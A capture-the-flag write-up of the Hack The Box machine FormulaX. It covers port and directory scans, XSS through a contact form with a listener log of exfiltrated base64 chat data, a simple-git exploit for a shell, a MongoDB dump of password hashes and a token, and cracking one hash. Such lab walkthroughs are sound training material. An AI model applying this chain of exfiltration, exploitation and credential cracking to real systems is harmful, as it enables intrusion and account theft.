HTB FormulaX
HTB FormulaX
HTB FormulaX
📄 IP Address: 10.10.11.6
Host: formulax.htb
Website
http://formulax.htb
HTB_FormulaX 1
On the website we can notice that the host redirects the URL to
http://formulax.htb/static/index.html which seems to be a login page. There is an option to
create an account. So, let's create one.
Since the registration was successful lets login and check the site.
HTB_FormulaX 2
HTB_FormulaX 3
I submitted a query “Tell me about yourself” And it responded with
nmapAutomator
HTB_FormulaX 4
|_ 256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-cors: GET POST
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /static/index.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTB_FormulaX 5
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTB_FormulaX 6
| http-enum:
| /admin/: Possible admin folder
| /admin/admin/: Possible admin folder
| /admin/account.php: Possible admin folder
| /admin/index.php: Possible admin folder
| /admin/login.php: Possible admin folder
| /admin/admin.php: Possible admin folder
| /admin/index.html: Possible admin folder
| /admin/login.html: Possible admin folder
| /admin/admin.html: Possible admin folder
| /admin/home.php: Possible admin folder
| /admin/controlpanel.php: Possible admin folder
| /admin/account.html: Possible admin folder
| /admin/admin_login.html: Possible admin folder
| /admin/cp.php: Possible admin folder
| /admin/admin_login.php: Possible admin folder
| /admin/admin-login.php: Possible admin folder
| /admin/home.html: Possible admin folder
| /admin/admin-login.html: Possible admin folder
| /admin/adminLogin.html: Possible admin folder
| /admin/controlpanel.html: Possible admin folder
| /admin/cp.html: Possible admin folder
| /admin/adminLogin.php: Possible admin folder
| /admin/account.cfm: Possible admin folder
| /admin/index.cfm: Possible admin folder
| /admin/login.cfm: Possible admin folder
| /admin/admin.cfm: Possible admin folder
| /admin/admin_login.cfm: Possible admin folder
| /admin/controlpanel.cfm: Possible admin folder
| /admin/cp.cfm: Possible admin folder
| /admin/adminLogin.cfm: Possible admin folder
| /admin/admin-login.cfm: Possible admin folder
| /admin/home.cfm: Possible admin folder
| /admin/account.asp: Possible admin folder
| /admin/index.asp: Possible admin folder
| /admin/login.asp: Possible admin folder
| /admin/admin.asp: Possible admin folder
| /admin/home.asp: Possible admin folder
| /admin/controlpanel.asp: Possible admin folder
| /admin/admin-login.asp: Possible admin folder
| /admin/cp.asp: Possible admin folder
| /admin/admin_login.asp: Possible admin folder
| /admin/adminLogin.asp: Possible admin folder
| /admin/account.aspx: Possible admin folder
| /admin/index.aspx: Possible admin folder
| /admin/login.aspx: Possible admin folder
| /admin/admin.aspx: Possible admin folder
| /admin/home.aspx: Possible admin folder
| /admin/controlpanel.aspx: Possible admin folder
| /admin/admin-login.aspx: Possible admin folder
HTB_FormulaX 7
| /admin/cp.aspx: Possible admin folder
| /admin/admin_login.aspx: Possible admin folder
| /admin/adminLogin.aspx: Possible admin folder
| /admin/index.jsp: Possible admin folder
| /admin/login.jsp: Possible admin folder
| /admin/admin.jsp: Possible admin folder
| /admin/home.jsp: Possible admin folder
| /admin/controlpanel.jsp: Possible admin folder
| /admin/admin-login.jsp: Possible admin folder
| /admin/cp.jsp: Possible admin folder
| /admin/account.jsp: Possible admin folder
| /admin/admin_login.jsp: Possible admin folder
| /admin/adminLogin.jsp: Possible admin folder
| /Admin/: Possible admin folder
| /admin/backup/: Possible backup
| /admin/download/backup.sql: Possible database backup
| /admin/upload.php: Admin File Upload
| /admin/CiscoAdmin.jhtml: Cisco Collaboration Server
| /admin/libraries/ajaxfilemanager/ajaxfilemanager.php: Log1 CMS
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/
FCKeditor File upload
| /admin/includes/tiny_mce/plugins/tinybrowser/upload.php: CompactCMS or B-Hind CMS/F
CKeditor File upload
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FC
Keditor File Upload
| /admin/jscript/upload.php: Lizard Cart/Remote File upload
| /admin/jscript/upload.html: Lizard Cart/Remote File upload
| /admin/jscript/upload.pl: Lizard Cart/Remote File upload
| /admin/jscript/upload.asp: Lizard Cart/Remote File upload
| /admin/environment.xml: Moodle files
|_ /logout/: Potentially interesting folder
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There is nothing eye-catching other than the port 4345 . Let's do directory enumeration.
HTB_FormulaX 8
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size:
11460
Target: http://formulax.htb/
Task Completed
The only interesting thing we see is the restricted/contact_us.html directory which we can
directly contact with Admin
There seems to be a possibility to XSS via this form. Let's verify it.
HTB_FormulaX 9
We seem to be able to upload files from our Kali to the Machine.
👣Foothold
Since we can upload files into the machine via XSS , we can create a payload to exploit
this.
HTB_FormulaX 10
This payload script sets up a real-time connection to a server, listens for message events
from the server, and sends a GET request to a specified URL whenever a ‘message’ event is
received. It also sends a client_message event with the data history to the server.
HTB_FormulaX 11
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54906 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54926 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 Accepted
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 [404]: OPTIONS /?d=V3JpdGUgYSBzY3JpcHQgdG8g
YXV0b21hdGUgdGhlIGF1dG8tdXBkYXRl - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54922 Closing
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 [404]: OPTIONS /?d=TWVzc2FnZSBTZW50Ojxicj5o
aXN0b3J5 - No such file or directory
[Sat Mar 16 01:36:03 2024] 10.10.11.6:54934 Closing
Greetings!. How can i help you today ?. You can type help to see some
buildin commands
Hello, I am Admin.Testing the Chat Application
Write a script for
dev-git-auto-update.chatbot.htb to work properly
Write a script to automate the auto-update
Message Sent:<br>history
Here from the decoded message, we got a subdomain. Let's add it to hosts and check the
site.
HTB_FormulaX 12
At the bottom we can notice that this page is built using simple-git v3.14 . Upon further
research I came to know that this version has vulnerability
https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3112221
Let's Exploit this vulnerability. First of all, let's create a shell file called shell.sh .
HTB_FormulaX 13
#️⃣Privilege Escalation
Through a thorough search, it was found that the target machine has a mongoDB .
www-data@formulax:/var/lib$ ls -la
total 152
drwxr-xr-x 38 root root 4096 Feb 20 16:16 .
drwxr-xr-x 14 root root 4096 Feb 20 16:16 ..
drwxr-xr-x 2 root root 4096 Jun 7 2023 PackageKit
drwxr-xr-x 3 root root 4096 Jun 7 2023 apport
drwxr-xr-x 5 root root 4096 Mar 5 09:57 apt
drwxr-xr-x 2 root root 4096 Jul 22 2023 aspell
drwxr-xr-x 8 root root 4096 Jan 30 07:56 cloud
drwxr-xr-x 2 root root 4096 Jun 7 2023 dbus
drwxr-xr-x 2 root root 4096 Feb 16 15:13 dhcp
drwxr-xr-x 3 root root 4096 Jul 22 2023 dictionaries-common
drwxr-xr-x 7 root root 4096 Mar 5 09:57 dpkg
drwxr-xr-x 3 root root 4096 Jul 22 2023 emacsen-common
drwxr-xr-x 4 root root 4096 Jun 15 2023 ghostscript
drwxr-xr-x 2 root root 4096 Apr 26 2023 git
drwxr-xr-x 4 root root 4096 Jun 7 2023 grub
drwxr-xr-x 2 root root 4096 Jul 22 2023 ispell
drwxr-xr-x 3 root root 4096 Jul 22 2023 libreoffice
drwxr-xr-x 2 root root 4096 Jul 22 2023 man-db
drwxr-xr-x 2 root root 4096 Apr 18 2022 misc
drwxr-xr-x 4 mongodb mongodb 4096 Mar 15 21:07 mongodb
drwxr-xr-x 6 mysql mysql 4096 Mar 15 19:26 mysql
drwxr-xr-x 7 root root 4096 Jun 11 2023 nginx
drwxr-xr-x 2 root root 4096 Mar 24 2022 os-prober
drwxr-xr-x 2 root root 4096 Feb 19 15:36 pam
drwxr-xr-x 4 root root 4096 Jun 15 2023 php
drwxr-xr-x 2 root root 4096 Mar 18 2022 plymouth
drwx------ 3 root root 4096 Feb 17 2023 polkit-1
drwx------ 2 root root 4096 Feb 17 2023 private
drwxr-xr-x 2 root root 4096 Feb 17 2023 python
-rw-r--r-- 1 root root 0 Feb 17 2023 shells.state
drwxr-xr-x 3 Debian-snmp Debian-snmp 4096 Feb 20 16:16 snmp
drwxr-xr-x 3 root root 4096 Feb 17 2023 sudo
drwxr-xr-x 12 root root 4096 Feb 19 13:36 systemd
drwxr-xr-x 2 root root 4096 Mar 16 2022 ubuntu-drivers-common
drwxr-xr-x 2 root root 4096 Feb 19 16:05 ubuntu-release-upgrader
drwxr-xr-x 3 root root 4096 Jan 30 08:03 ucf
drwxr-xr-x 2 root root 4096 Feb 10 2023 update-notifier
HTB_FormulaX 14
drwxr-xr-x 2 root root 4096 Mar 9 2022 upower
drwxr-xr-x 3 root root 4096 Jan 30 08:05 vmware
www-data@formulax:/tmp$ mongo
MongoDB shell version v4.4.29
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongod
b
Implicit session: session { "id" : UUID("74bb87f6-dc6a-41e2-afc2-fcb552d528cd") }
MongoDB server version: 4.4.8
---
The server generated these startup warnings when booting:
2024-03-15T19:26:23.021+00:00: Using the XFS filesystem is strongly recommended
with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesy
stem
2024-03-15T19:26:24.573+00:00: Access control is not enabled for the database.
Read and write access to data and configuration is unrestricted
---
> show dbs
admin 0.000GB
config 0.000GB
local 0.000GB
testing 0.000GB
> use testing
switched to db testing
> show collections
messages
users
> db.users.find()
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chat
bot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.",
"terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR
5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTA1MzczODV9.
2YCy-Qfh_uk_pb55k9-7jygxfhiXsbfJP65fLGDTuvM", "__v" : 0 }
{ "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "fran
k_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7
s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
Here we got the hash password of user frank. Let's crack it via Johntheripper
HTB_FormulaX 15
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:07 DONE (2024-03-16 02:53) 0.1305g/s 375.9p/s 375.9c/s 375.9C/s onlyme..socc
er9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Entering sudo -l fails to view the privilege escalation information. Then check the
background port.
frank_dorky@formulax:~$ sudo -l
[sudo] password for frank_dorky:
Sorry, user frank_dorky may not run sudo on forumlax.
frank_dorky@formulax:~$ netstat -avn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:8082 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8081 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:44139 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN
HTB_FormulaX 16
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:37191 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:80 127.0.0.1:41900 TIME_WAIT
tcp 0 0 127.0.0.1:51146 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55766 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55776 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:46610 ESTABLISHED
tcp 0 0 127.0.0.1:55194 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45806 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:58790 127.0.0.1:80 ESTABLISHED
tcp 0 0 127.0.0.1:55174 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45882 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40454 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55162 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51186 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43466 TIME_WAIT
tcp 0 0 127.0.0.1:40444 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35896 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:45852 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55672 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:56238 ESTABLISHED
tcp 0 0 127.0.0.1:8082 127.0.0.1:43462 TIME_WAIT
tcp 0 0 127.0.0.1:51268 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55748 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55136 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45840 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:46204 127.0.0.1:44139 ESTABLISHED
tcp 0 0 127.0.0.1:3000 127.0.0.1:41684 ESTABLISHED
tcp 0 0 127.0.0.1:40566 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55844 127.0.0.1:8082 TIME_WAIT
tcp 0 52 10.10.11.6:22 10.10.14.68:46246 ESTABLISHED
tcp 0 0 127.0.0.1:45910 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40652 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35880 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:51088 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51284 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:36148 127.0.0.1:80 ESTABLISHED
tcp 0 0 127.0.0.1:8082 127.0.0.1:43720 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55804 TIME_WAIT
tcp 0 0 127.0.0.1:55688 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55124 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45912 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51228 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40538 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40536 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51176 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45936 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43526 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35862 127.0.0.1:3000 TIME_WAIT
HTB_FormulaX 17
tcp 0 0 127.0.0.1:45758 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43618 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43732 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55102 TIME_WAIT
tcp 0 0 127.0.0.1:55122 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56048 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:43762 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45796 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51178 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51324 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55784 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43714 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40606 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35878 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:45900 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55632 TIME_WAIT
tcp 0 0 127.0.0.1:40550 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:56048 ESTABLISHED
tcp 0 0 127.0.0.1:35908 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:55876 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56238 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:8082 127.0.0.1:55906 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:46016 TIME_WAIT
tcp 0 0 127.0.0.1:40622 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55052 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51128 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45834 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55640 TIME_WAIT
tcp 0 0 127.0.0.1:43446 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51138 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43730 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40594 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40502 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45868 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40436 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51248 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55920 TIME_WAIT
tcp 0 0 127.0.0.1:51068 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:45816 TIME_WAIT
tcp 0 0 127.0.0.1:55664 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55230 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55066 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55694 TIME_WAIT
tcp 0 0 127.0.0.1:44139 127.0.0.1:46204 ESTABLISHED
tcp 0 0 127.0.0.1:40684 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55076 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43642 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:45968 TIME_WAIT
tcp 0 0 127.0.0.1:45772 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:58790 ESTABLISHED
HTB_FormulaX 18
tcp 0 0 127.0.0.1:43496 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:37191 127.0.0.1:57480 ESTABLISHED
tcp 0 0 127.0.0.1:45952 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55820 TIME_WAIT
tcp 0 0 127.0.0.1:55184 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:51310 TIME_WAIT
tcp 0 0 127.0.0.1:46036 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45792 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55684 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43480 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45956 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:51160 TIME_WAIT
tcp 0 0 127.0.0.1:43786 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:58438 TIME_WAIT
tcp 0 0 127.0.0.1:40518 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40496 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:36134 ESTABLISHED
tcp 0 0 127.0.0.1:43672 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55728 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:40670 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:40468 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:56254 ESTABLISHED
tcp 0 0 127.0.0.1:43576 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:36148 ESTABLISHED
tcp 0 0 127.0.0.1:45890 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:35870 127.0.0.1:3000 TIME_WAIT
tcp 0 0 127.0.0.1:55248 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40434 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55788 TIME_WAIT
tcp 0 0 127.0.0.1:55134 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43660 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43530 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:80 127.0.0.1:55842 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55630 TIME_WAIT
tcp 0 0 127.0.0.1:45916 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55210 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40610 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:56244 ESTABLISHED
tcp 0 0 127.0.0.1:55708 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43456 TIME_WAIT
tcp 0 0 127.0.0.1:46000 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:51246 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43544 TIME_WAIT
tcp 0 0 127.0.0.1:55894 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51258 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55720 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40636 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43630 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56852 127.0.0.1:27017 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:51198 TIME_WAIT
HTB_FormulaX 19
tcp 0 0 127.0.0.1:59512 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:55836 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43450 127.0.0.1:8082 TIME_WAIT
tcp 0 1 10.10.11.6:33170 8.8.8.8:53 SYN_SENT
tcp 0 0 127.0.0.1:43518 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45968 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55670 TIME_WAIT
tcp 0 0 127.0.0.1:43688 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43614 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45848 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45984 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40656 127.0.0.1:8082 TIME_WAIT
tcp 0 0 10.10.11.6:55966 10.10.14.68:5550 ESTABLISHED
tcp 0 0 127.0.0.1:41684 127.0.0.1:3000 ESTABLISHED
tcp 0 0 127.0.0.1:45962 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55118 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43600 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51302 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:45780 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55246 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55094 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43460 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55292 TIME_WAIT
tcp 0 0 127.0.0.1:40430 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55058 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43656 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51114 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:45774 TIME_WAIT
tcp 0 0 127.0.0.1:43560 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:48454 127.0.0.1:27017 TIME_WAIT
tcp 0 0 127.0.0.1:55652 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51300 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43592 TIME_WAIT
tcp 0 0 127.0.0.1:43476 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43742 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43454 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:40452 TIME_WAIT
tcp 0 0 127.0.0.1:55044 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55738 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40688 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40484 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55226 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40500 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51230 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:46610 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:40644 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56254 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:43698 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51214 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40530 127.0.0.1:8082 TIME_WAIT
HTB_FormulaX 20
tcp 0 0 127.0.0.1:40708 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51074 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:56244 127.0.0.1:27017 ESTABLISHED
tcp 0 0 127.0.0.1:45824 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55882 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43508 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55860 TIME_WAIT
tcp 0 0 127.0.0.1:55150 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55750 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:27017 127.0.0.1:59512 ESTABLISHED
tcp 0 0 127.0.0.1:40672 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43750 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55646 TIME_WAIT
tcp 0 0 127.0.0.1:43556 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:43610 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40452 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:55628 TIME_WAIT
tcp 0 0 127.0.0.1:8082 127.0.0.1:43784 TIME_WAIT
tcp 0 0 127.0.0.1:57480 127.0.0.1:37191 ESTABLISHED
tcp 0 0 127.0.0.1:40438 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:46048 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:40582 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:55260 127.0.0.1:8082 TIME_WAIT
tcp 0 0 127.0.0.1:51096 127.0.0.1:8082 TIME_WAIT
